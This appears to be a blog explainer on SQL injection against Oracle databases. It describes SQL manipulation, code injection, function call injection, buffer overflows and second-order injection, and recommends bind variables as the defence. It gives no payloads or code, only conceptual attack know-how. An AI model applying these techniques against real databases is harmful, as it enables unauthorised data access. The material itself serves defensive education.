TECH-TADKA

SQL injection attacks are simple in nature – an attacker passes string input to an application in hopes manipulating the SQL statement to his or her advantage.  The complexity of the attack involves exploiting a SQL statement that may be unknown to the attacker.  Open-source applications and commercial applications delivered with source code are more vulnerable since an attacker can find potentially vulnerable statements prior to an attack.

CATEGORIES OF SQL INJECTION ATTACKS

There are four main categories of SQL Injection attacks against Oracle databases –

1.  SQL Manipulation
2.  Code Injection
3.  Function Call Injection
4.  Buffer Overflows

The first two categories, SQL manipulation and code injection, should be well known to the reader, as
these are the most commonly described attacks for all types of databases (including SQL Server,
MySQL, PostgreSQL, and Oracle).

SQL manipulation typically involves modifying the SQL statement through set operations (e.g.,
UNION) or altering the WHERE clause to return a different result.  Many documented SQL injection
attacks are of this type.  The most well known attack is to modify the WHERE clause of the user
authentication statement so the WHERE clause always results in TRUE.

Code injection is when an attacker inserts new SQL statements or database commands into the SQL
statement.  The classic code injection attack is to append a SQL Server EXECUTE command to the
vulnerable SQL statement.  Code injection only works when multiple SQL statements per database
request are supported.  SQL Server and PostgreSQL have this capability and it is sometimes possible
to inject multiple SQL statements with Oracle.  Oracle code injection vulnerabilities involve the
dynamic execution of SQL in PL/SQL.

The last two categories are more specific attacks against Oracle databases and are not well known or
documented.  In the vast majority of our application audits, we have found applications vulnerable to
these two types of attacks.

Function call injection is the insertion of Oracle database functions or custom functions into a
vulnerable SQL statement.  These function calls can be used to make operating system calls or
manipulate data in the database.

SQL injection of buffer overflows is a subset of function call injection.  In several commercial and
open-source databases, vulnerabilities exist in a few database functions that may result in a buffer
overflow.  Patches are available for most of these vulnerabilities, but many production databases
remain un-patched.

WHAT’S VULNERABLE

An application is vulnerable to SQL injection for only one reason – end user string input is not properly
validated and is passed to a dynamic SQL statement without any such validation.  The string input is
usually passed directly to the SQL statement.  However, the user input may be stored in the database
and later passed to a dynamic SQL statement, referred to as a second-order SQL injection.  Because
of the stateless nature of many web applications, it is common to write data to the database or store it
using some other means between web pages.  This indirect type of attack is much more complex and
often requires in-depth knowledge of the application.

WHAT’S NOT VULNERABLE

SQL Statements using bind variables are generally protected from SQL Injection as the Oracle
database will use the value of the bind variable exclusively and not interpret the contents of the
variable in any way.  PL/SQL and JDBC allow for bind variables.  Bind variables should be extensively
used for both security and performance reasons.  

Also see : What is SQL injection ?